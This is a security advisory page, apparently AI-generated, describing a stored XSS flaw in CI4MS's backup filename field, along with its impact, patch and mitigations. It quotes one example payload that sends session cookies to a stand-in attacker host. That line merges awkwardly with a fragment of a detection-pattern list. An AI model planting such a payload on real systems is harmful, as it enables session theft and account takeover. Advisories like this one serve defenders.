
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-41201 is a Stored DOM Blind XSS vulnerability in CI4MS (a CodeIgniter 4-based CMS skeleton) that enables full account takeover and privilege escalation via a malicious payload embedded in the backup module's filename field. It affects CI4MS version 0.31.4.0 and all prior versions below 0.31.5.0. The vulnerability was published to the GitHub Advisory Database on April 18, 2026, and to the NVD on May 7, 2026. The CVSS v3.1 base score is reported as 9.1 (Critical) by the project's own advisory, while the GitHub Advisory Database assigns a score of 6.8 (Moderate) using a slightly different vector (Github Advisory, GitHub Security Advisory).
The root cause is improper neutralization of user-controllable input in the backup module's filename field (CWE-79), where the application fails to apply output encoding before rendering dynamically loaded DataTables filename strings in the browser DOM. An authenticated attacker with access to the backup module can upload or manipulate a SQL backup file so that its filename field contains a hidden JavaScript payload; when an administrator or other privileged user views the backup management interface, the payload executes in their browser context. The fix in version 0.31.5.0 applies CodeIgniter's esc() output escaping function to the affected filename strings, preventing script injection (GitHub Security Advisory, CI4MS Release).
Successful exploitation allows an authenticated attacker to execute arbitrary JavaScript in the browsers of other users — including administrators — who view the backup management interface. This enables session cookie/token theft, unauthorized actions performed as the victim (including account takeover), and privilege escalation to superadmin level. All three CIA dimensions are rated High, meaning confidential data can be exfiltrated, application integrity can be compromised, and availability may be disrupted through administrative actions taken under the attacker's control (Github Advisory, GitHub Security Advisory).
No public proof-of-concept exploit code has been observed, and there is no evidence of in-the-wild exploitation at this time (Github Advisory). The EPSS score is approximately 0.044–0.063%, placing it in the lower percentiles for near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with access to the backup module, which limits the attacker pool but does not eliminate risk in multi-tenant or shared-admin environments.
backup_<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.sql.<script>, onerror=, javascript:) or URL-encoded equivalents.The vendor has released CI4MS version 0.31.5.0, which patches this vulnerability by applying the esc() output escaping function to dynamically rendered backup filenames in DataTables. All administrators running versions prior to 0.31.5.0 should upgrade immediately. As interim mitigations, restrict access to the backup module to the minimum necessary accounts, implement a Content Security Policy (CSP) header to block inline script execution, and audit existing backup filenames for suspicious content (CI4MS Release, Github Advisory).
The vulnerability was reported by security researchers bugmithlegend and DexterHK, who were credited in both the GitHub advisory and the release notes (GitHub Security Advisory, CI4MS Release). The Hacker Wire published a dedicated write-up on the vulnerability, and a Reddit thread in r/pwnhub highlighted the issue to the broader security community. The @offseq account on Infosec.Exchange also noted the vulnerability, contributing to community awareness.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."